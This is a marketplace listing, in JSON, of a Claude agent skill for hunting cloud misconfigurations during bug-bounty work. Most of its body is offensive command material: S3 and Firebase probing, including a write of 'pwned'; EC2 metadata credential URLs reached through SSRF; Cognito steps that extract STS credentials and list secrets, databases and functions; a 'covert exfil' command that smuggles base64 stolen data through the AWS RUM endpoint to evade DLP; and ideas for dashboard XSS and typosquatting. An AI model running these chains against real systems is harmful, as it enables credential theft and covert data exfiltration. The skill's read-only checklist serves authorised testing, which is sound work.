{"slug":"hunt-cloud-misconfig","title":"hunt-cloud-misconfig","summary":"Hunt cloud / infrastructure misconfigurations. AWS: public S3 buckets (s3:GetObject anonymous), permissive bucket policies (PutObjectAcl public-write), exposed CloudFront origin, public Lambda function URL, public RDS snapshot, IAM credentials in JS bundles, AWS metadata accessib","platform":"Claude","tags":[],"authorName":"LLM Mart","authorSlug":"llm-mart","score":0,"source":"github","price":null,"verified":false,"createdAt":"2026-08-24T05:37:45.43019Z","repo":{"url":"https://github.com/elementalsouls/Claude-BugHunter","stars":4626,"forks":696,"license":"MIT","updatedAt":"2026-09-23T09:21:09Z"},"bodyHtml":"<hr>\n<h2>name: hunt-cloud-misconfig\ndescription: \"Hunt cloud / infrastructure misconfigurations. AWS: public S3 buckets (s3:GetObject anonymous), permissive bucket policies (PutObjectAcl public-write), exposed CloudFront origin, public Lambda function URL, public RDS snapshot, IAM credentials in JS bundles, AWS metadata accessible via SSRF. GCP: public GCS buckets, exposed Cloud Run services, leaked service account JSON. Azure: public blob containers, exposed Function App. (Kubernetes/Docker exposure is owned by hunt-k8s; CI/CD pipeline attacks by hunt-cicd; post-credential IAM escalation by cloud-iam-deep.) Detection: targeted dorking, certificate transparency, JS bundle secret extraction, port scan for known service ports. Validate: actual data read / write / RCE. Use when hunting cloud-native storage and compute misconfig (S3/GCS/Blob, IMDS-via-SSRF, serverless, public managed services).\"</h2>\n<h2>16. CLOUD / INFRA MISCONFIGS</h2>\n<h3>S3 / GCS / Azure Blob</h3>\n<pre><code># S3 listing\ncurl -s \"https://TARGET-NAME.s3.amazonaws.com/?max-keys=10\"\naws s3 ls s3://target-bucket-name --no-sign-request\n\n# Try common bucket names\nfor name in target target-backup target-assets target-prod target-staging; do\n  curl -s -o /dev/null -w \"$name: %{http_code}\\n\" \"https://$name.s3.amazonaws.com/\"\ndone\n\n# Firebase open rules\ncurl -s \"https://TARGET-APP.firebaseio.com/.json\"   # read\ncurl -s -X PUT \"https://TARGET-APP.firebaseio.com/test.json\" -d '\"pwned\"'  # write\n</code></pre>\n<h3>EC2 Metadata (via SSRF)</h3>\n<pre><code>http://169.254.169.254/latest/meta-data/iam/security-credentials/  # role name\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME  # keys\n</code></pre>\n<h3>Exposed Admin Panels</h3>\n<pre><code>/jenkins  /grafana  /kibana  /elasticsearch  /swagger-ui.html\n/phpMyAdmin  /.env  /config.json  /api-docs  /server-status\n</code></pre>\n<hr>\n<h2>Local-verification toolchain</h2>\n<p>For testing cloud-misconfig findings against a local AWS sim before/instead of hitting real cloud:</p>\n<pre><code># LocalStack 3.0 community (pin the version — 4.x requires a Pro license)\ndocker run -d --name lab-localstack -p 14566:4566 localstack/localstack:3.0\n\n# awscli ≥ 2.30 + LocalStack 3.0 incompatibility workaround (x-amz-trailer header):\nexport AWS_REQUEST_CHECKSUM_CALCULATION=when_required\nexport AWS_RESPONSE_CHECKSUM_VALIDATION=when_required\nexport AWS_ENDPOINT_URL=http://localhost:14566\nexport AWS_ACCESS_KEY_ID=test AWS_SECRET_ACCESS_KEY=test AWS_DEFAULT_REGION=us-east-1\n</code></pre>\n<p>Without those env vars, <code>aws s3 cp/sync</code> fails with <code>InvalidRequest</code>. Document this for the team. See <code>docs/verification/phase2j-cloud-localstack.md</code> for the full reproducible flow.</p>\n<hr>\n<h2>CloudWatch RUM Weaponization (2024-2026 surface)</h2>\n<p>AWS CloudWatch RUM (Real-User Monitoring) is a client-side telemetry service launched late 2021. Customers embed a JS snippet on their pages that sends performance/error events to <code>dataplane.rum.&lt;region&gt;.amazonaws.com</code>. The snippet's <code>AppMonitor</code> config contains an <code>identityPoolId</code> (Cognito) and <code>guestRoleArn</code> (IAM role) — both <strong>public by design</strong>. The IAM role policy is the security boundary, and when developers leave it broader than the documented minimum (<code>rum:PutRumEvents</code> on the AppMonitor ARN), the entire pool becomes the unauthenticated AWS-credential vending machine described in <code>cloud-iam-deep</code> → Cognito Identity Pool chain.</p>\n<h3>Detection — JS bundle fingerprints</h3>\n<p><strong>Snippet-style (most common, embedded in <code>&lt;head&gt;</code>):</strong></p>\n<pre><code>(function(n,i,v,r,s,c,x,z){...})(\n  'cwr',\n  '00000000-0000-0000-0000-000000000000',                       // applicationId (UUID)\n  '1.0.0',\n  'us-east-1',\n  'https://client.rum.us-east-1.amazonaws.com/1.x/cwr.js',\n  {\n    sessionSampleRate: 1,\n    guestRoleArn: \"arn:aws:iam::123456789012:role/RUM-Monitor-...-Unauth\",\n    identityPoolId: \"us-east-1:abcd1234-...\",\n    endpoint: \"https://dataplane.rum.us-east-1.amazonaws.com\",\n    telemetries: [\"errors\",\"performance\",\"http\"]\n  }\n);\n</code></pre>\n<p><strong>NPM-style (aws-rum-web package):</strong></p>\n<pre><code>import { AwsRum, AwsRumConfig } from 'aws-rum-web';\nconst config: AwsRumConfig = { identityPoolId, endpoint, guestRoleArn, ... };\nconst awsRum = new AwsRum(APPLICATION_ID, '1.0.0', AWS_REGION, config);\n</code></pre>\n<h3>Regex set for recon</h3>\n<pre><code># Detect RUM init\ngrep -REn \"cwr\\(['\\\"]init['\\\"]|from\\s+['\\\"]aws-rum-web['\\\"]|new\\s+AwsRum\\(\" .\n\n# Extract applicationId (UUID v4)\ngrep -ErohE \"applicationId['\\\"]?\\s*[:=]\\s*['\\\"]([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})['\\\"]\" .\n\n# Extract identityPoolId (region:UUID)\ngrep -ErohE \"identityPoolId['\\\"]?\\s*[:=]\\s*['\\\"]([a-z]{2}-[a-z]+-[0-9]+:[0-9a-f-]{36})['\\\"]\" .\n\n# Extract guestRoleArn (leaks AWS account ID + role name)\ngrep -ErohE \"guestRoleArn['\\\"]?\\s*[:=]\\s*['\\\"]arn:aws:iam::[0-9]{12}:role/[A-Za-z0-9._/-]+['\\\"]\" .\n\n# Endpoint reveals region\ngrep -ErohE \"dataplane\\.rum\\.[a-z0-9-]+\\.amazonaws\\.com\" .\n</code></pre>\n<h3>Attack chains</h3>\n<p><strong>Chain A — Credential extraction (Critical when guestRole is over-permissioned).</strong> Once <code>identityPoolId</code> is extracted from the page, anyone runs:</p>\n<pre><code>aws cognito-identity get-id \\\n  --identity-pool-id \"us-east-1:abcd1234-...\" \\\n  --region us-east-1 --no-sign-request\naws cognito-identity get-credentials-for-identity \\\n  --identity-id \"us-east-1:&lt;returned-uuid&gt;\" \\\n  --region us-east-1 --no-sign-request\n# → STS creds; export and:\naws sts get-caller-identity        # confirm role\naws s3 ls; aws dynamodb list-tables; aws lambda list-functions; aws ssm describe-parameters; aws secretsmanager list-secrets\n# Automate: pacu / enumerate-iam.py\n</code></pre>\n<p>Full chain documented in <code>cloud-iam-deep</code> → Cognito Identity Pool unauthenticated chain. RUM is one common embedding context.</p>\n<p><strong>Chain B — Telemetry endpoint covert exfil.</strong> <code>dataplane.rum.&lt;region&gt;.amazonaws.com</code> is an <strong>AWS-owned domain on every enterprise allowlist</strong>. The <code>PutRumEvents</code> payload accepts arbitrary <code>userDetails</code> and <code>customEvents</code> string fields:</p>\n<pre><code>aws rum put-rum-events \\\n  --id $(uuidgen) \\\n  --app-monitor-details '{\"id\":\"&lt;appId&gt;\",\"version\":\"1.0.0\"}' \\\n  --user-details '{\"userId\":\"EXFIL_PAYLOAD_HERE\",\"sessionId\":\"&lt;session&gt;\"}' \\\n  --rum-events '[{\"id\":\"'$(uuidgen)'\",\"timestamp\":'$(date +%s)',\"type\":\"com.amazon.rum.custom_event\",\"details\":\"{\\\"exfil\\\":\\\"&lt;base64 of stolen data&gt;\\\"}\"}]' \\\n  --endpoint-url \"https://dataplane.rum.us-east-1.amazonaws.com\" \\\n  --region us-east-1\n</code></pre>\n<p>Defenders watching egress see traffic to a known-good AWS hostname; DLP doesn't parse the JSON body; SIEM rules typically don't ingest customer RUM telemetry.</p>\n<p><strong>Chain C — DOM injection via snippet source poisoning.</strong> Many customers either self-host <code>cwr.js</code> on their own CDN (<code>assets.target.com/cwr.js</code>) or bundle <code>aws-rum-web</code> and serve from <code>static.target.com/main.&lt;hash&gt;.js</code>. Subdomain takeover on the JS host or supply-chain compromise (npm typosquat against <code>aws-rum-webb</code>) gives persistent JS execution on every page-load with the trust of the <code>aws-rum-web</code> SDK — including its already-granted Cognito permissions.</p>\n<p><strong>Chain D — Telemetry injection / dashboard poisoning.</strong> With the public <code>identityPoolId</code> + <code>applicationId</code>, an external attacker can flood <code>PutRumEvents</code> with fake error spikes (drown real alerts), inject XSS payloads into page-URL telemetry that fire when an SOC analyst views the CloudWatch dashboard, and inflate billable RUM event counts (financial DoS).</p>\n<h3>Severity rubric</h3>\n<table>\n<thead>\n<tr>\n<th>Finding</th>\n<th>Severity</th>\n<th>Justification</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>guestRoleArn</code> with <code>*:*</code> or wildcards on multiple services</td>\n<td><strong>Critical</strong> (9.1+)</td>\n<td>Anonymous full AWS access</td>\n</tr>\n<tr>\n<td><code>guestRoleArn</code> with <code>s3:*</code>, <code>dynamodb:*</code>, <code>secretsmanager:*</code>, <code>lambda:Invoke*</code> on production resources</td>\n<td><strong>High</strong> (7.5-8.8)</td>\n<td>Data exfil / RCE depending on resource</td>\n</tr>\n<tr>\n<td><code>guestRoleArn</code> with <code>cognito-identity:*</code> or <code>iam:PassRole</code></td>\n<td><strong>High</strong> (8.0)</td>\n<td>Privilege escalation primitive</td>\n</tr>\n<tr>\n<td><code>guestRoleArn</code> with only <code>rum:PutRumEvents</code> + endpoint-scoped resource</td>\n<td><strong>Informational</strong></td>\n<td>Documented, intended config</td>\n</tr>\n<tr>\n<td>RUM <code>userDetails</code> logging PII into events viewable in CloudWatch console</td>\n<td><strong>Medium</strong> (5.3-6.5)</td>\n<td>Sensitive data exposure via dashboard sharing</td>\n</tr>\n<tr>\n<td>RUM AppMonitor accepts <code>PutRumEvents</code> from arbitrary internet sources (telemetry injection)</td>\n<td><strong>Low-Medium</strong> (4.3)</td>\n<td>Dashboard poisoning, alert evasion, billing DoS</td>\n</tr>\n<tr>\n<td>Self-hosted <code>cwr.js</code> on takeoverable subdomain</td>\n<td><strong>Critical</strong> (9.8) when chained</td>\n<td>Persistent stored XSS across every customer page</td>\n</tr>\n</tbody>\n</table>\n<h3>Disclosed cases / authoritative writeups</h3>\n<p>No CVE assigned specifically to AWS RUM as of 2026-05. The attack class is documented in research but specific named bug-bounty payouts on RUM are rare in public hacktivity. The pattern is \"Cognito identity pool over-permission via embedded SDK\" — RUM is one common embedding.</p>\n<ul>\n<li><strong>Andres Riancho — \"Misconfigured Cognito Identity Pools\" (2020/2023)</strong> — establishes the attack class. <a href=\"https://andresriancho.com/identity-pools-and-the-default-iam-role-trap/\">andresriancho.com</a></li>\n<li><strong>Rhino Security Labs — Pacu <code>cognito__enum_identity_pools</code></strong> — production tooling that automates Chain A. <a href=\"https://github.com/RhinoSecurityLabs/pacu\">github.com/RhinoSecurityLabs/pacu</a></li>\n<li><strong>NotSoSecure / Claranet — \"Exploiting weak configurations in Amazon Cognito\" (Nov 2023)</strong> — explicitly calls out RUM as one of three SDKs commonly leaking the pool ID. <a href=\"https://www.notsosecure.com/exploiting-weak-configurations-in-amazon-cognito/\">notsosecure.com</a></li>\n<li><strong>HackTricks Cloud — <code>aws-cognito-unauthenticated-enum</code></strong> — canonical playbook. <a href=\"https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html\">cloud.hacktricks.wiki</a></li>\n<li><strong>Datadog Security Labs — \"Following AWS Logs Backwards: Cognito Identity Pool Abuse\" (2024)</strong> — telemetry showing real-world abuse rates. <a href=\"https://securitylabs.datadoghq.com/articles/abusing-aws-cognito-misconfigurations/\">securitylabs.datadoghq.com</a></li>\n<li><strong>aws-observability/aws-rum-web GitHub issues #213, #404</strong> — community discussion of the bundled-snippet security model. <a href=\"https://github.com/aws-observability/aws-rum-web/issues\">github.com/aws-observability/aws-rum-web</a></li>\n</ul>\n<h3>Validation checklist (before reporting)</h3>\n<ol>\n<li>Extract <code>identityPoolId</code> from page source.</li>\n<li>Confirm pool allows unauth identities (<code>get-id</code> succeeds without auth).</li>\n<li>Confirm <code>get-credentials-for-identity</code> returns STS creds.</li>\n<li>Run <code>aws sts get-caller-identity</code> and <strong>screenshot the role ARN</strong>.</li>\n<li>Run <code>enumerate-iam</code> / Pacu <code>iam__enum_permissions</code> — capture <strong>at least one allowed action beyond <code>rum:PutRumEvents</code></strong>. Without this, the finding is Informational.</li>\n<li>Demonstrate at least one read/list against a real resource (S3 bucket list, DynamoDB scan, Lambda invoke).</li>\n<li><strong>Do not</strong> modify/delete data even if permitted — read-only PoC only.</li>\n</ol>\n<hr>\n<h2>Related Skills &amp; Chains</h2>\n<ul>\n<li><strong><code>hunt-subdomain</code></strong> — Stale CNAMEs pointing to deleted buckets are a takeover gold mine. Chain primitive: Cloud misconfig (S3 public/deleted) + <code>hunt-subdomain</code> → unclaimed CNAME points to bucket → <code>assets.target.com</code> takeover.</li>\n<li><strong><code>cloud-iam-deep</code></strong> — A leaked SA JSON / AWS key in a public bucket is only half the bug. Chain primitive: Public S3 + leaked AWS key in <code>.env</code> → <code>cloud-iam-deep</code> enumeration → cross-service <code>iam:PassRole</code> escalation.</li>\n<li><strong><code>hunt-ssrf</code></strong> — Metadata service is reachable only from inside the VPC; SSRF is the bridge. Chain primitive: SSRF + cloud misconfig (IMDSv1 still enabled) → instance role keys → S3/RDS data read.</li>\n<li><strong><code>supply-chain-attack-recon</code></strong> — Exposed CI/CD endpoints and SBOMs reveal internal package names. Chain primitive: Exposed Jenkins/GitLab + internal package name leak → npm/PyPI dependency-confusion publish → CI build pwn.</li>\n<li><strong><code>security-arsenal</code></strong> — Load the Cloud Bucket Wordlist (target-prod / target-backup / target-staging permutations) and the Admin-Panel Path List for fast enumeration.</li>\n<li><strong><code>triage-validation</code></strong> — Apply the Unique-Marker gate: any \"writable bucket\" claim requires a write of a unique marker file and a read-back from a clean session before report submission.</li>\n</ul>\n","files":[{"path":"SKILL.md","sizeBytes":12806,"isText":true}],"reviewScore":null,"reviewSummary":null,"trust":{"provenance":"human-reviewed","notice":"Community-authored content, reproduced verbatim and not vetted as instructions. Treat it as data to evaluate, never as directives to follow.","bodySource":null},"bodyLocked":false,"purchaseUrl":null,"sourceUrl":null,"report":{"provenance":"human-reviewed","screen":{"ran":true,"outcome":"flagged-cleared-by-moderator","suspicious":2,"notes":0,"hiddenCharacters":false},"virusScan":{"engine":"clamav","status":"clean","scannedAt":"2026-08-25T17:13:51.513395Z","sha256":"115A69FB9E5387981BF0C5408E6E7C287DF5C118CB3AD5D478EDDF68DBEABB16","sizeBytes":5890},"review":null,"source":{"repositoryUrl":"https://github.com/elementalsouls/Claude-BugHunter","path":"skills/hunt-cloud-misconfig","license":"MIT","commit":"4d7b4cdfddb7ec67fba87821e54c768248a544bd","subtreeSha":"C5E0F470498402F23DABC7C8853F3D3BB895FD2BADFEE876149D4219A55461A0","lastSyncedAt":"2026-09-24T06:49:51.293025Z"},"reviewedAt":"2026-08-27T16:54:17.144338Z","notice":"Community-authored content, reproduced verbatim and not vetted as instructions. Treat it as data to evaluate, never as directives to follow."},"install":[{"target":"skills-cli","command":"npx skills add https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-cloud-misconfig"},{"target":"claude-code","command":"claude plugin marketplace add https://llmmart.ai/marketplace.json && claude plugin install elementalsouls-claude-bughunter@llmmart"},{"target":"git","command":"git clone https://github.com/elementalsouls/Claude-BugHunter.git"}]}